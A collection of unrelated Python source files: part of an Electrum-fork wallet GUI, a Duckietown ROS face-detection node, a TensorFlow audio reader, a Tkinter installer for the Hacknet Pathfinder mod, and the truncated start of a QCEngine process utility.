grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart EXOS-Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('EXOS-Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"the sender, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
face_detector_node.py | #!/usr/bin/env python
import rospy
import numpy as np
import math
from duckietown_msgs.msg import Twist2DStamped, LanePose
from sensor_msgs.msg import CompressedImage, Image
from cv_bridge import CvBridge, CvBridgeError
import cv2
import sys
from duckietown_utils.jpg import image_cv_from_jpg
import time
import threading
class lane_controller(object):
def __init__(self):
self.node_name = rospy.get_name()
self.lane_reading = None
self.pub_counter = 0
self.thread_lock = threading.Lock()
self.active = True
# self.stats = Stats()
#cv
self.bridge = CvBridge()
# Publicaiton
self.pub_car_cmd = rospy.Publisher("~car_cmd",Twist2DStamped,queue_size=1)
self.pub_image_original = rospy.Publisher("~image_with_face", Image, queue_size=1)
self.sub_lane_reading = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
# safe shutdown
rospy.on_shutdown(self.custom_shutdown)
# timer
rospy.loginfo("[%s] Initialized " %(rospy.get_name()))
def custom_shutdown(self):
rospy.loginfo("[%s] Shutting down..." %self.node_name)
# Stop listening
self.sub_lane_reading.unregister()
# Send stop command
car_control_msg = Twist2DStamped()
car_control_msg.v = 0.0
car_control_msg.omega = 0.0
self.publishCmd(car_control_msg)
rospy.sleep(0.5) #To make sure that it gets published.
rospy.loginfo("[%s] Shutdown" %self.node_name)
def cbImage(self, image_msg):
# self.status.received()
if not self.active:
return
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start()
def processImage(self, image_msg):
if not self.thread_lock.acquire(False):
# self.status.skipped()
return
try:
self.cbPose(image_msg)
finally:
self.thread_lock.release()
def publishCmd(self,car_cmd_msg):
self.pub_car_cmd.publish(car_cmd_msg)
def cbPose(self, image_msg):
# self.stats.processed()
#self.lane_reading = lane_pose_msg
#cross_track_err = lane_pose_msg.d - self.d_offset
#heading_err = lane_pose_msg.phi
#img = self.bridge.imgmsg_to_cv2(image_msg)
narr = np.fromstring(image_msg.data, np.uint8)
image = cv2.imdecode(narr, cv2.CV_LOAD_IMAGE_COLOR)
# image_cv = cv2.imdecode(np.fromstring(image_msg.data, np.uint8), cv2.CV_LOAD_IMAGE_COLOR)
#image_cv = self.bridge.imgmsg_to_cv2(image_msg, "bgr8")
#image = image_cv_from_jpg(image_msg.data)
faceCascade = cv2.CascadeClassifier('/home/ubuntu/duckietown/catkin_ws/src/spring2016_nctu/wama/face_detector/src/haarcascade_frontalface_default.xml')
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Detect faces in the image
faces = faceCascade.detectMultiScale(gray,scaleFactor=2,minNeighbors=5,minSize=(10, 10),flags = cv2.cv.CV_HAAR_SCALE_IMAGE)
print "Found {0} faces!".format(len(faces))
for (x, y, w, h) in faces:
cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)
# cv2.imshow("preview", image)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
#cv2.rectangle(image, (100, 100), (120, 140), (0, 255, 0), 2)
image_msg_out = self.bridge.cv2_to_imgmsg(image, "bgr8")
image_msg_out.header.stamp = image_msg.header.stamp
self.pub_image_original.publish(image_msg_out)
#image_msg_out = self.bridge.cv2_to_imgmsg(gray, "bgr8")
#image_msg_out.header.stamp = image_msg.header.stamp
#self.pub_image_gray.publish(image_msg_out)
#face_cascade = cv2.CascadeClassifier('~/haarcascade_frontalface_default.xml')
#eye_cascade = cv2.CascadeClassifier('~/haarcascade_eye.xml')
#gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
#faces = face_cascade.detectMultiScale(gray, 1.3, 5)
#for (x,y,w,h) in faces:
# cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)
# roi_gray = gray[y:y+h, x:x+w]
# roi_color = img[y:y+h, x:x+w]
# self.eyes = eye_cascade.detectMultiScale(roi_gray)
#for (ex,ey,ew,eh) in self.eyes:
# cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)
# cv2.imwrite('hard.png',img)
# cv2.destroyAllWindows()
car_control_msg = Twist2DStamped()
#car_control_msg.header = lane_pose_msg.header
#car_control_msg.v = self.v_bar #*self.speed_gain #Left stick V-axis. Up is positive
#if math.fabs(cross_track_err) > self.d_thres:
# cross_track_err = cross_track_err / math.fabs(cross_track_err) * self.d_thres
#car_control_msg.omega = self.k_d * cross_track_err + self.k_theta * heading_err #*self.steer_gain #Right stick H-axis. Right is negative
# controller mapping issue
# car_control_msg.steering = -car_control_msg.steering
# print "controls: speed %f, steering %f" % (car_control_msg.speed, car_control_msg.steering)
# self.pub_.publish(car_control_msg)
if len(faces) != 0:
car_control_msg.v=0
car_control_msg.omega=0
self.publishCmd(car_control_msg)
if len(faces) == 0:
car_control_msg.v=0.5
car_control_msg.omega=0
self.publishCmd(car_control_msg)
#rospy.Timer(rospy.Duration.from_sec(1), self.publishCmd(car_control_msg))
#car_control_msg.v=0
#car_control_msg.omega=0
#self.publishCmd(car_control_msg)
# debuging
# self.pub_counter += 1
# if self.pub_counter % 50 == 0:
# self.pub_counter = 1
# print "lane_controller publish"
# print car_control_msg
if __name__ == "__main__":
rospy.init_node("lane_controller",anonymous=False)
lane_control_node = lane_controller()
rospy.spin()
|
audio_reader.py | import fnmatch
import os
import random
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
FILE_PATTERN = r'p([0-9]+)_([0-9]+)\.wav'
def get_category_cardinality(files):
id_reg_expression = re.compile(FILE_PATTERN)
min_id = None
max_id = None
for filename in files:
matches = id_reg_expression.findall(filename)[0]
id, recording_id = [int(id_) for id_ in matches]
if min_id is None or id < min_id:
min_id = id
if max_id is None or id > max_id:
max_id = id
return min_id, max_id
def randomize_files(files):
for file in files:
file_index = random.randint(0, (len(files) - 1))
yield files[file_index]
def find_files(directory, pattern='*.wav'):
'''Recursively finds all files matching the pattern.'''
files = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, pattern):
files.append(os.path.join(root, filename))
return files
def load_generic_audio(directory, sample_rate):
'''Generator that yields audio waveforms from the directory.'''
files = find_files(directory)
id_reg_exp = re.compile(FILE_PATTERN)
print("files length: {}".format(len(files)))
randomized_files = randomize_files(files)
for filename in randomized_files:
ids = id_reg_exp.findall(filename)
if not ids:
# The file name does not match the pattern containing ids, so
# there is no id.
category_id = None
else:
# The file name matches the pattern for containing ids.
category_id = int(ids[0][0])
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
audio = audio.reshape(-1, 1)
audio = audio / np.abs(audio).max() * 0.999
yield audio, filename, category_id
def trim_silence(audio, threshold, frame_length=2048):
'''Removes silence at the beginning and end of a sample.'''
if audio.size < frame_length:
frame_length = audio.size
energy = librosa.feature.rmse(audio, frame_length=frame_length)
frames = np.nonzero(energy > threshold)
indices = librosa.core.frames_to_samples(frames)[1]
# Note: indices can be an empty array, if the whole audio was silence.
return audio[indices[0]:indices[-1]] if indices.size else audio[0:0]
def not_all_have_id(files):
''' Return true iff any of the filenames does not conform to the pattern
we require for determining the category id.'''
id_reg_exp = re.compile(FILE_PATTERN)
for file in files:
ids = id_reg_exp.findall(file)
if not ids:
return True
return False
class AudioReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
def __init__(self,
audio_dir,
coord,
sample_rate,
gc_enabled,
receptive_field,
sample_size=None,
silence_threshold=None,
queue_size=32):
self.audio_dir = audio_dir
self.sample_rate = sample_rate
self.coord = coord
self.sample_size = sample_size
self.receptive_field = receptive_field
self.silence_threshold = silence_threshold
self.gc_enabled = gc_enabled
self.threads = []
self.sample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.queue = tf.PaddingFIFOQueue(queue_size,
['float32'],
shapes=[(None, 1)])
self.enqueue = self.queue.enqueue([self.sample_placeholder])
if self.gc_enabled:
self.id_placeholder = tf.placeholder(dtype=tf.int32, shape=())
self.gc_queue = tf.PaddingFIFOQueue(queue_size, ['int32'],
shapes=[()])
self.gc_enqueue = self.gc_queue.enqueue([self.id_placeholder])
# TODO Find a better way to check this.
# Checking inside the AudioReader's thread makes it hard to terminate
# the execution of the script, so we do it in the constructor for now.
files = find_files(audio_dir)
if not files:
raise ValueError("No audio files found in '{}'.".format(audio_dir))
if self.gc_enabled and not_all_have_id(files):
raise ValueError("Global conditioning is enabled, but file names "
"do not conform to pattern having id.")
# Determine the number of mutually-exclusive categories we will
# accomodate in our embedding table.
if self.gc_enabled:
_, self.gc_category_cardinality = get_category_cardinality(files)
# Add one to the largest index to get the number of categories,
# since tf.nn.embedding_lookup expects zero-indexing. This
# means one or more at the bottom correspond to unused entries
# in the embedding lookup table. But that's a small waste of memory
# to keep the code simpler, and preserves correspondance between
# the id one specifies when generating, and the ids in the
# file names.
self.gc_category_cardinality += 1
print("Detected --gc_cardinality={}".format(
self.gc_category_cardinality))
else:
self.gc_category_cardinality = None
def dequeue(self, num_elements):
output = self.queue.dequeue_many(num_elements)
return output
def dequeue_gc(self, num_elements):
return self.gc_queue.dequeue_many(num_elements)
def thread_main(self, sess):
stop = False
# Go through the dataset multiple times
while not stop:
iterator = load_generic_audio(self.audio_dir, self.sample_rate)
for audio, filename, category_id in iterator:
if self.coord.should_stop():
stop = True
break
if self.silence_threshold is not None:
# Remove silence
audio = trim_silence(audio[:, 0], self.silence_threshold)
audio = audio.reshape(-1, 1)
if audio.size == 0:
print("Warning: {} was ignored as it contains only "
"silence. Consider decreasing trim_silence "
"threshold, or adjust volume of the audio."
.format(filename))
audio = np.pad(audio, [[self.receptive_field, 0], [0, 0]],
'constant')
if self.sample_size:
# Cut samples into pieces of size receptive_field +
# sample_size with receptive_field overlap
while len(audio) > self.receptive_field:
piece = audio[:(self.receptive_field +
self.sample_size), :]
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: piece})
audio = audio[self.sample_size:, :]
if self.gc_enabled:
sess.run(self.gc_enqueue, feed_dict={
self.id_placeholder: category_id})
else:
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: audio})
if self.gc_enabled:
sess.run(self.gc_enqueue,
feed_dict={self.id_placeholder: category_id})
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True # Thread will close when parent quits.
thread.start()
self.threads.append(thread)
return self.threads
|
PathfinderInstaller.py | import os
import platform
import stat
import subprocess
from tkinter import *
from tkinter import filedialog
from tkinter.ttk import *
import shutil
from threading import Thread
import requests
from zipfile import ZipFile
from io import BytesIO
import re
import pathlib
if platform.system() == 'Windows':
from winreg import *
def install_pathfinder(gen_event_callback, hacknet_directory):
for asset in requests.get('https://api.github.com/repos/Arkhist/Hacknet-Pathfinder/releases').json()[0]['assets']:
if 'Pathfinder.Release' in asset['name']:
url = asset['browser_download_url']
break
with ZipFile(BytesIO(requests.get(url).content)) as pathfinder_zip:
pathfinder_zip.extractall(path=hacknet_directory)
patcher_exe = os.path.join(hacknet_directory, 'PathfinderPatcher.exe')
if platform.system() == "Linux":
os.chmod(patcher_exe, stat.S_IRWXU)
completed = subprocess.run([patcher_exe], cwd=hacknet_directory)
if completed.returncode != 0:
gen_event_callback('<<InstallFailure>>')
return
try:
os.remove(patcher_exe)
os.remove(os.path.join(hacknet_directory, 'Mono.Cecil.dll'))
hacknet_exe = os.path.join(hacknet_directory, 'Hacknet.exe')
os.rename(hacknet_exe, os.path.join(hacknet_directory, 'HacknetOld.exe'))
os.rename(os.path.join(hacknet_directory, 'HacknetPathfinder.exe'), hacknet_exe)
except OSError:
gen_event_callback('<<InstallFailure>>')
return
gen_event_callback('<<InstallComplete>>')
def try_find_hacknet_dir():
def get_library_folders(vdf_path):
with open(vdf_path) as vdf:
match = re.search(r'^\s*"[0-9]+"\s*"(.+)"', vdf.read(), flags=re.MULTILINE)
if match is None:
return []
return match.groups()
hacknet_dir = ''
folders = []
if platform.system() == 'Windows':
try:
registry = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
key = OpenKey(registry, r'SOFTWARE\Wow6432Node\Valve\Steam')
root_steamapps = os.path.join(QueryValueEx(key, 'InstallPath')[0], 'steamapps')
folders.append(root_steamapps)
libraries = get_library_folders(os.path.join(root_steamapps, 'libraryfolders.vdf'))
folders.extend([os.path.join(library, 'steamapps') for library in libraries])
except OSError:
return hacknet_dir
else:
home = pathlib.Path.home()
steam_root = None
possible_roots = [
os.path.join(home, '.local', 'share', 'Steam'),
os.path.join(home, '.steam', 'steam'),
os.path.join(home, '.steam', 'root'),
os.path.join(home, '.steam'),
os.path.join(home, '.var', 'app', 'com.valvesoftware.Steam', '.local', 'share', 'steam'),
os.path.join(home, '.var', 'app', 'com.valvesoftware.Steam', '.steam', 'steam'),
os.path.join(home, '.var', 'app', 'com.valvesoftware.Steam', '.steam', 'root'),
os.path.join(home, '.var', 'com.valvesoftware.Steam', '.steam')
]
for dir in possible_roots:
if not os.path.exists(dir) or not os.path.exists(os.path.join(dir, 'steam.sh')):
continue
steam_root = dir
break
if steam_root is None:
return hacknet_dir
possible_steamapps = [
os.path.join(steam_root, 'steamapps'),
os.path.join(steam_root, 'steam', 'steamapps'),
os.path.join(steam_root, 'root', 'steamapps')
]
root_steamapps = None
for possible_steamapp in possible_steamapps:
if os.path.exists(possible_steamapp):
root_steamapps = possible_steamapp
break
if root_steamapps is None:
return hacknet_dir
folders.append(root_steamapps)
libraries = get_library_folders(os.path.join(root_steamapps, 'libraryfolders.vdf'))
for library in libraries:
for possible_steamapp in possible_steamapps:
if os.path.exists(os.path.join(library, possible_steamapp)):
folders.append(possible_steamapp)
for folder in folders:
hacknet_acf = os.path.join(folder, 'appmanifest_365450.acf')
if not os.path.exists(hacknet_acf):
continue
hacknet_dir_candidate = os.path.join(folder, 'common', 'Hacknet')
hacknet_exe = os.path.join(hacknet_dir_candidate, 'Hacknet.exe')
if not os.path.exists(hacknet_dir_candidate) or not os.path.exists(hacknet_exe):
continue
hacknet_dir = hacknet_dir_candidate
return hacknet_dir
class App(Frame):
def __init__(self, master: Tk):
super().__init__(master)
self.master = master
self.master.bind('<<InstallComplete>>', self.install_complete)
self.master.bind('<<InstallFailure>>', self.install_failure)
self.content = Frame(self.master)
self.file_frame = Frame(self.content)
self.dir_label = Label(self.file_frame, text='Hacknet Folder')
self.hacknet_directory = StringVar()
self.hacknet_directory.set(try_find_hacknet_dir())
self.dir = Entry(self.file_frame, textvariable=self.hacknet_directory)
self.reopen_button = Button(self.file_frame, text='Open Directory Select', command=self.open_dir)
self.button_frame = Frame(self.content)
self.install_button = Button(self.button_frame, text='Install', command=self.install)
self.uninstall_button = Button(self.button_frame, text='Uninstall', command=self.uninstall)
self.setup_grid()
self.progress = None
def setup_grid(self):
self.master.title('Pathfinder Installer')
self.master.geometry("750x75")
self.master.resizable(FALSE, FALSE)
self.content.grid(column=0, row=0, sticky='NSEW')
self.file_frame.grid(column=0, row=0, sticky='NSEW')
self.dir_label.grid(column=0, row=0, padx=(5, 0))
self.dir.grid(column=1, row=0, columnspan=2, padx=5, sticky='EW')
self.reopen_button.grid(column=3, row=0, padx=(0, 5))
self.button_frame.grid(column=0, row=1, pady=(0, 5))
self.install_button.grid(column=0, row=0, padx=(0, 20))
self.uninstall_button.grid(column=1, row=0, padx=(20, 0))
self.master.columnconfigure(0, weight=1)
self.master.rowconfigure(0, weight=1)
self.content.columnconfigure(0, weight=1)
self.content.rowconfigure(0, weight=1)
self.content.rowconfigure(1, weight=1)
self.file_frame.columnconfigure(1, weight=1)
self.file_frame.rowconfigure(0, weight=1)
def open_dir(self):
self.hacknet_directory.set(filedialog.askdirectory())
def install(self):
hacknet_dir = self.hacknet_directory.get()
if not self.valid_directory(hacknet_dir):
return
self.progress = Progressbar(self.button_frame, orient=HORIZONTAL, length=500, mode='indeterminate')
self.progress.grid(column=0, row=0, columnspan=2)
self.progress.start()
Thread(target=install_pathfinder, args=(self.master.event_generate, hacknet_dir)).start()
def install_complete(self, event):
self.make_message_box('Installation Complete!', title='Success')
self.progress.destroy()
self.progress = None
def install_failure(self, event):
self.make_message_box('Installation failed, this may have left an unfinished installation in your Hacknet folder!', title='Failure')
self.progress.destroy()
self.progress = None
return
def uninstall(self):
hacknet_dir = self.hacknet_directory.get()
if not self.valid_directory(hacknet_dir):
return
hacknet_exe_path = os.path.join(hacknet_dir, 'Hacknet.exe')
old_hacknet_path = os.path.join(hacknet_dir, 'HacknetOld.exe')
if not os.path.exists(old_hacknet_path):
self.make_message_box('Could not find OldHacknet.exe, are you sure Pathfinder is installed (and was installed by this installer)?', title='Error!')
return
try:
os.remove(hacknet_exe_path)
os.rename(old_hacknet_path, hacknet_exe_path)
shutil.rmtree(os.path.join(hacknet_dir, 'BepInEx'), ignore_errors=True)
except OSError:
self.make_message_box('Failed to clean up all files, you may be left with an incomplete uninstall!', title='Error!')
self.make_message_box('Pathfinder successfully uninstalled', title='Success')
def valid_directory(self, directory):
valid = True
if not os.path.exists(directory):
valid = False
self.make_message_box(f'The directory {directory} does not exist!', title='Error!')
elif not os.path.exists(os.path.join(directory, 'Hacknet.exe')):
valid = False
self.make_message_box(f'The directory {directory} does not contain a file called Hacknet.exe!', title='Error!')
return valid
def make_message_box(self, message, title='Message'):
message_box = Toplevel(self.master)
message_box.resizable(FALSE, FALSE)
message_box.title(title)
message_frame = Frame(message_box)
message_frame.grid()
Label(message_frame, text=message).grid(column=0, row=0, padx=5, pady=5)
Button(message_frame, text='Ok', command=message_box.destroy).grid(column=0, row=1, pady=5)
root = Tk()
app = App(root)
root.mainloop()
|
util.py | """
Code taken from https://github.com/andrew-abimansour/QCEngine
Provides QCEngine utils for executing a process, with support for handling large data files.
"""
from typing import Tuple, Dict, Optional, Any, List, Union, BinaryIO, TextIO
from threading import Thread
import time
from contextlib import contextmanager
from pathlib import Path
from functools import partial
import tempfile
import shutil
import sys
import os
import subprocess
import io
def terminate_process(proc: Any, timeout: int = 15) -> None:
if proc.poll() is None:
# Sigint (keyboard interupt)
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
start = time.time()
while (proc.poll() is None) and (time.time() < (start + timeout)):
time.sleep(0.02)
# Flat kill
finally:
proc.kill()
@contextmanager
def temporary_directory(
child: str = None,
*,
parent: str = None,
suffix: str = None,
messy: bool = False,
exist_ok: bool = False,
) -> str:
"""Create and cleanup a quarantined working directory with a parent scratch directory.
Parameters
----------
child : str, optional
By default, `None`, quarantine directory generated through
`tempfile.mdktemp` so guaranteed unique and safe. When specified,
quarantine directory has exactly `name`.
parent : str, optional
Create directory `child` elsewhere than TMP default.
For TMP default, see https://docs.python.org/3/library/tempfile.html#tempfile.gettempdir
suffix : str, optional
Create `child` with identifying label by passing to ``tempfile.mkdtemp``.
Encouraged use for debugging only.
messy : bool, optional
Leave scratch directory and contents on disk after completion.
exist_ok : bool, optional
Run commands in a possibly pre-existing directory.
Yields
------
str
Full path of scratch directory.
Raises
------
FileExistsError
If `child` specified and directory already exists (perhaps from a
previous `messy=True` run).
Examples
--------
parent child suffix --> creates
------ ----- ------ -------
None None None --> /tmp/tmpliyp1i7x/
None None _anharm --> /tmp/tmpliyp1i7x_anharm/
None myqcjob None --> /tmp/myqcjob/
/scratch/johndoe None None --> /scratch/johndoe/tmpliyp1i7x/
/scratch/johndoe myqcjob None --> /scratch/johndoe/myqcjob/
"""
if child is None:
tmpdir = Path(tempfile.mkdtemp(dir=parent, suffix=suffix))
else:
if parent is None:
parent = Path(tempfile.gettempdir())
else:
parent = Path(parent)
tmpdir = parent / child
try:
os.mkdir(tmpdir)
except FileExistsError:
if exist_ok:
pass
else:
raise
try:
yield tmpdir
finally:
if not messy:
shutil.rmtree(tmpdir)
@contextmanager
def popen(
args: List[str],
append_prefix: bool = False,
popen_kwargs: Optional[Dict[str, Any]] = None,
pass_output_forward: bool = False,
) -> Dict[str, Any]:
"""
Opens a background task
Code and idea from dask.distributed's testing suite
https://github.com/dask/distributed
Parameters
----------
args: List[str]
Input arguments for the command
append_prefix: bool
Whether to prepend the Python path prefix to the command being executed
popen_kwargs: Dict[str, Any]
Any keyword arguments to use when launching the process
pass_output_forward: bool
Whether to pass the stdout and stderr forward to the system's stdout and stderr
Returns
-------
exe: dict
Dictionary with the following keys:
<ul>
<li>proc: Popen object describing the background task</li>
<li>stdout: String value of the standard output of the task</li>
<li>stdeer: String value of the standard error of the task</li>
</ul>
"""
args = list(args)
if popen_kwargs is None:
popen_kwargs = {}
else:
popen_kwargs = popen_kwargs.copy()
# Bin prefix
if sys.platform.startswith("win"):
bin_prefix = os.path.join(sys.prefix, "Scripts")
else:
bin_prefix = os.path.join(sys.prefix, "bin")
# Do we prefix with Python?
if append_prefix:
args[0] = os.path.join(bin_prefix, args[0])
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
popen_kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
# Route the standard error and output
popen_kwargs["stdout"] = subprocess.PIPE
popen_kwargs["stderr"] = subprocess.PIPE
# Prepare StringIO objects to store the stdout and stderr
stdout = io.BytesIO()
stderr = io.BytesIO()
# Ready the output
ret = {"proc": subprocess.Popen(args, **popen_kwargs)}
# Spawn threads that will read from the stderr/stdout
# The PIPE uses a buffer with finite capacity. The underlying
# process will stall if it is unable to write to the buffer
# because the buffer is full. These threads continuously read
# from the buffers to ensure that they do not fill.
#
def read_from_buffer(buffer: BinaryIO, storage: io.BytesIO, sysio: TextIO):
